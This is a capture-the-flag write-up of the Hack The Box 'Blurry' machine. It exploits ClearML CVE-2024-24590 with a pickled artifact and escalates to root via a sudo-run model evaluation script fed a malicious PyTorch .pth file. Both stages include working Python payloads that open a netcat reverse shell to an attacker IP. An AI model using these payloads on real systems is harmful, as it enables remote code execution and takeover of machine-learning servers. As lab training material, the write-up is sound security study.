USER



Nmap does not reveal much beyond a domain name:



Then I went for subdomain enumeration to dig out more useful information using ffuf:

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://blurry.htb" -H "HOST: FUZZ.blurry.htb" -c -fs 169
```

We have 3 subdomain entries:



The "chat" subdomain allows us to register an account to enter a workspace:

From the chat history, we learn that jippity is the admin, who is going to review tasks before tomorrow. The conversation also shows a group collaborating and sharing data to complete a "vision" for the project.



From the "app" website we can sneak into the assignment workspace:

ClearML is a versatile tool designed to automate and streamline machine learning workflows. It serves as an end-to-end platform for managing, monitoring, and orchestrating machine learning experiments and pipelines.

In this case the server is not private, so we can simply enter a name to take part in the project. Once inside, there are clear instructions on how to submit a task using a Python module:



Follow the instructions and enter the generated credentials at the prompt; we are then ready to upload our tasks:

To exploit ClearML, we leverage CVE-2024-24590. An attacker can create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method of the Artifact class (which is exactly what the admin is going to do) to download and load the file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.
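The mechanism behind this can be reproduced harmlessly with the standard library alone. The sketch below is not the CVE exploit and does not touch ClearML: `Probe` is a hypothetical class, and its "payload" is just a call to `int`, but it shows that `pickle.loads` invokes whatever callable `__reduce__` returned.

```python
import pickle


class Probe:
    """Benign stand-in for a malicious artifact (hypothetical name)."""

    def __reduce__(self):
        # pickle records "call int('2a', 16)" instead of the object's state.
        # An attacker would return something like (os.system, (cmd,)) here.
        return (int, ("2a", 16))


blob = pickle.dumps(Probe())   # serializing calls nothing
result = pickle.loads(blob)    # the loader calls int("2a", 16) on our behalf

# What comes back is the call's return value, not a Probe instance.
print(type(result).__name__, result)
```

The caller never gets a chance to inspect the data first: by the time `pickle.loads` returns, the call has already happened.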



Before that, we need to figure out how the admin is going to run the artifact. In the dashboard we can discover the Review JSON Artifacts created by the admin:

It's an auto-run script that exposes serious security risks:

```python
#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

def process_json_artifact(data, artifact_name):
    """
    Process a JSON artifact represented as a Python dictionary.
    Print all key-value pairs contained in the dictionary.
    """
    print(f"[+] Artifact '{artifact_name}' Contents:")
    for key, value in data.items():
        print(f" - {key}: {value}")

def process_task(task):
    artifacts = task.artifacts

    for artifact_name, artifact_object in artifacts.items():
        data = artifact_object.get()

        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")

def main():
    review_task = Task.init(project_name="Black Swan",
                            task_name="Review JSON Artifacts",
                            task_type=Task.TaskTypes.data_processing)

    # Retrieve tasks tagged for review
    tasks = Task.get_tasks(project_name='Black Swan', tags=["review"], allow_archived=False)

    if not tasks:
        print("[!] No tasks up for review.")
        return

    threads = []
    for task in tasks:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        p = Process(target=process_task, args=(task,))
        p.start()
        threads.append(p)
        task.set_archived(True)

    for thread in threads:
        thread.join(60)
        if thread.is_alive():
            thread.terminate()

    # Mark the ClearML task as completed
    review_task.close()

def cleanup():
    client = APIClient()
    tasks = client.tasks.get_all(
        system_tags=["archived"],
        only_fields=["id"],
        order_by=["-last_update"],
        page_size=100,
        page=0,
    )

    # delete and cleanup tasks
    for task in tasks:
        # noinspection PyBroadException
        try:
            deleted_task = Task.get_task(task_id=task.id)
            deleted_task.delete(
                delete_artifacts_and_models=True,
                skip_models_used_by_other_tasks=True,
                raise_on_error=False
            )
        except Exception as ex:
            continue

if __name__ == "__main__":
    main()
    cleanup()
```

The Python script review_tasks.py performs a series of tasks specifically focused on reviewing and processing JSON artifacts within a project named "Black Swan". It is used for automated review and cleanup of tasks in a ClearML project, ensuring efficient management and processing of artifacts, specifically focusing on JSON data types.

- `process_json_artifact(data, artifact_name)`: Takes JSON data (as a Python dictionary) and the name of the artifact, then prints the content by iterating through its key-value pairs.

- `process_task(task)`: Processes a task retrieved from the ClearML server by iterating over its artifacts. If an artifact's data is a dictionary, it calls `process_json_artifact` to print its contents. Otherwise, it reports that the artifact is not in the expected dictionary format. Note that `artifact_object.get()` runs before the type check, so the artifact is already deserialized by the time it is rejected.

- `main()`:

  - Initializes a ClearML task with specific properties for data processing.

  - Retrieves tasks from the "Black Swan" project with the tag "review".

  - For each retrieved task, spawns a new process using Python's multiprocessing to handle the task's review (processing its artifacts).

  - After starting all processes, waits for each to complete and terminates any that exceed 60 seconds.

  - Closes the review task, marking it as completed.

- `cleanup()`: Uses the ClearML API client to fetch tasks with the "archived" system tag, then attempts to delete these tasks and their related artifacts and models.

We can refer to the article to create a payload, but the original CVE proof of concept does not give us a reverse shell as-is! I first constructed the payload the way the article describes, like this:

```python
import os
from clearml import Task
import pickle

class RunCommand:
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.9 4444 >/tmp/f"
        return (os.system, (cmd,))

command = RunCommand()

# [!] Here comes the problem!
with open("axura.pkl", "wb") as f:
    pickle.dump(command, f)

task = Task.init(project_name="Black Swan",
                 task_name="axura-task",
                 tags=["review"],
                 task_type=Task.TaskTypes.data_processing,
                 output_uri=True)

task.upload_artifact(name="axura_artifact",
                     artifact_object="axura.pkl",
                     retries=2,
                     extension_name=".pkl",
                     wait_on_upload=True)

task.execute_remotely(queue_name='default')
```

This way we create a .pkl file and pass it to the task.upload_artifact function, expecting the malicious command to run. But it just won't work. As the image below shows, PosixPath('axura.pkl') suggests that the artifact 'axura.pkl' is recognized as a file path to a saved file:

In other words, we passed a local file to the "artifact_object" parameter, so the data is deserialized as a "PosixPath", namely a filesystem path, rather than as the command object to be executed. By contrast, a payload that executes successfully can be verified as:

Therefore, we need to pass the actual object that contains the payload (the RunCommand object in this case) to the "artifact_object" parameter, so that the review process runs the malicious command:

import os

from clearml import Task

class RunCommand:

def __reduce__(self):

cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.9 4444 >/tmp/f"

return (os.system, (cmd,))

command = RunCommand()

task = Task.init(project_name="Black Swan",

task_name="axura-task",

tags=["review"],

task_type=Task.TaskTypes.data_processing,

output_uri=True)

task.upload_artifact(name="axura_artifact",

artifact_object=command,

retries=2,

wait_on_upload=True)



task.execute_remotely(queue_name='default')Run the exploit script, we will manage to submit a task for juppity to review:


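The difference between the two upload attempts can be illustrated offline. The sketch below is only an analogy built on the standard `pickle` module: it does not call ClearML, and how ClearML stores path artifacts internally is not something this writeup verified beyond the `PosixPath` output. `Probe` is a hypothetical, harmless stand-in for `RunCommand`.

```python
import pickle
from pathlib import Path


class Probe:
    def __reduce__(self):
        # Harmless stand-in for (os.system, (cmd,))
        return (len, ("axura",))


# Attempt 1: the artifact is a *path* that points at a pickle file.
# Round-tripping it only rebuilds the path; the file is never unpickled.
as_path = pickle.loads(pickle.dumps(Path("axura.pkl")))

# Attempt 2: the artifact is the object itself.
# Round-tripping it triggers the callable returned by __reduce__.
as_object = pickle.loads(pickle.dumps(Probe()))

print(repr(as_path))    # a path object, nothing was executed
print(repr(as_object))  # the return value of len("axura")
```

Neither result is a dictionary, so the review script would report both as "not a dictionary", but only the second one has executed a callable by that point.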

Then we get the reverse shell as the website admin jippity and take the user flag:

ROOT



By checking sudo -l, we can discover an attack surface:

Take a look at the shell script /usr/bin/evaluate_model:

```bash
#!/bin/bash

# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.

if [ "$#" -ne 1 ]; then
    /usr/bin/echo "Usage: $0 <path_to_model.pth>"
    exit 1
fi

MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"

/usr/bin/mkdir -p "$TEMP_DIR"

file_type=$(/usr/bin/file --brief "$MODEL_FILE")

# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
    # POSIX tar archive (older PyTorch format)
    /usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
    # Zip archive (newer PyTorch format)
    /usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
    /usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
    exit 2
fi

/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
    fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")

    if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
        /usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
        /bin/rm "$MODEL_FILE"
        break
    fi
done

/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"

if [ -f "$MODEL_FILE" ]; then
    /usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
    /usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
```

This script is designed to evaluate a model file against a proprietary dataset, incorporating thorough security checks to ensure that the model file does not contain any malicious components.

Security Scanning of Extracted Files:

- The script searches the temporary directory for files that match `*.pkl` or are named `pickle` (commonly associated with Python's `pickle` serialization, which can be abused maliciously).

- It uses `fickling`, a Python pickle file scanner, to analyze each file found. `fickling` is invoked to check for malicious content, and its output is processed with `jq` to detect components marked as "OVERTLY_MALICIOUS".

- If any malicious components are found, the script deletes the model file and breaks out of the loop.

Cleanup:

- The script removes all files in the temporary directory and then deletes the directory itself to ensure no leftover data.

Final Evaluation:

- If the model file still exists (i.e., it was not deleted due to containing malicious content), it is considered safe. The script then proceeds to run the Python script to evaluate the model, passing the model file as an argument.

The script follows reasonable security practice for handling potentially unsafe input files, especially serialized data formats that can be exploited. This means we cannot simply hand it a pickle-serialized file to run, as we did before.
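To get a feel for what a static pickle scanner can see without loading anything, here is a minimal sketch based on the standard `pickletools` module. It is not fickling's algorithm, and it says nothing about how fickling assigns its severity levels; `referenced_globals` and `Probe` are hypothetical names, and the string tracking used for `STACK_GLOBAL` is a simple heuristic.

```python
import pickle
import pickletools


def referenced_globals(blob):
    """List 'module.name' imports a pickle would perform, without loading it."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(blob):
        if opcode.name == "GLOBAL":
            # Protocols <= 3: the argument is "module name" in one string
            found.append(arg.replace(" ", ".", 1))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol >= 4: module and name were pushed as the last two strings
            found.append(".".join(strings[-2:]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Probe:
    def __reduce__(self):
        return (len, ("abc",))   # harmless stand-in for (os.system, (cmd,))


print(referenced_globals(pickle.dumps(Probe(), protocol=3)))
print(referenced_globals(pickle.dumps(Probe(), protocol=4)))
```

Both calls report `builtins.len`. A scanner that walks the opcode stream this way sees which callable a pickle will import before any of it runs, which is why a payload that plainly names `os.system` is an easy thing to flag.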



First I checked the privileges we have on the relevant files and directory:

Files inside the "/models" directory are owned by root and we don't have permission to change them. But luckily we have write privilege on the "models" folder itself, meaning we can create arbitrary files within that path.

Therefore, we should be able to create a malicious .pth file and have the user jippity run the shell script on it with sudo privileges. The shell script accepts an arbitrary (*) parameter, and we happen to have write access to the /models directory at the same time.

As mentioned above, the security checks stop us from simply dropping a malicious pickle file into the folder; the exception is the .pth file. This extension refers to PyTorch model files. PyTorch is a popular machine learning framework, and this file type is often used to store trained model weights. These files are binary and are used by PyTorch for loading pre-trained models into memory for inference or further training.
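The extension itself plays no role in how evaluate_model treats the file: `file --brief` looks at the content, and the script then searches the extracted archive for pickle members. The sketch below mirrors that logic with the standard library for the zip case only. The member name `axura/data.pkl` mimics the layout of a zip-format PyTorch checkpoint, but treat it as an assumption; `pickle_members` is a hypothetical helper.

```python
import io
import pickle
import zipfile


def pickle_members(container):
    """Return archive members the script's find filter would match."""
    with zipfile.ZipFile(container) as archive:
        return [
            name for name in archive.namelist()
            if name.endswith(".pkl") or name.rsplit("/", 1)[-1] == "pickle"
        ]


# Build an in-memory stand-in for a zip-format .pth file (assumed layout).
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("axura/data.pkl", pickle.dumps({"weights": [0.1, 0.2]}))
    archive.writestr("axura/version", "3\n")

buffer.seek(0)
print(zipfile.is_zipfile(buffer))   # detected by content, not by extension
print(pickle_members(buffer))       # only these members would be scanned
```

Only the members returned by the filter are passed to the scanner, so the pickle inside the archive is what has to survive the check.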

After training a model in PyTorch, we can save the model's state dictionary (which contains the model's parameters) using torch.save():

```python
import torch

model = ...  # Assume model is defined and trained
torch.save(model.state_dict(), 'model_weights.pth')
```

To use the saved model, we load the state dictionary back into our model architecture:

```python
model = ...  # Model architecture must be defined
model.load_state_dict(torch.load('model_weights.pth'))
model.eval()  # Set the model to evaluation mode
```

Here we will use the first method, torch.save(), to create a malicious file. According to the documentation, we can define a custom PyTorch model that includes a potentially malicious serialization method. It leverages Python's pickle serialization mechanism, and torch then saves the object into a malicious .pth file:

```python
import torch
import torch.nn as nn
import os

class EvilModel(nn.Module):
    # PyTorch's base class for all neural network modules
    def __init__(self):
        super(EvilModel, self).__init__()
        self.linear = nn.Linear(10, 1)

    # define how the data flows through the model
    def forward(self, axura):  # passes input through the linear layer.
        return self.linear(axura)

    # Overridden __reduce__ Method
    def __reduce__(self):
        cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.9 4445 >/tmp/f"
        return os.system, (cmd,)

# Create an instance of the model
model = EvilModel()

# Save the model using torch.save
torch.save(model, 'axura.pth')
```

__reduce__ is a special method that pickle uses to determine how objects are serialized. By overriding it, we inject malicious serialization behavior into the "EvilModel" instance, just as we did when exploiting the ClearML server before.





Upload the generated .pth file to the victim machine and place it under the /models directory:



We can then use the sudo privilege to root the machine:
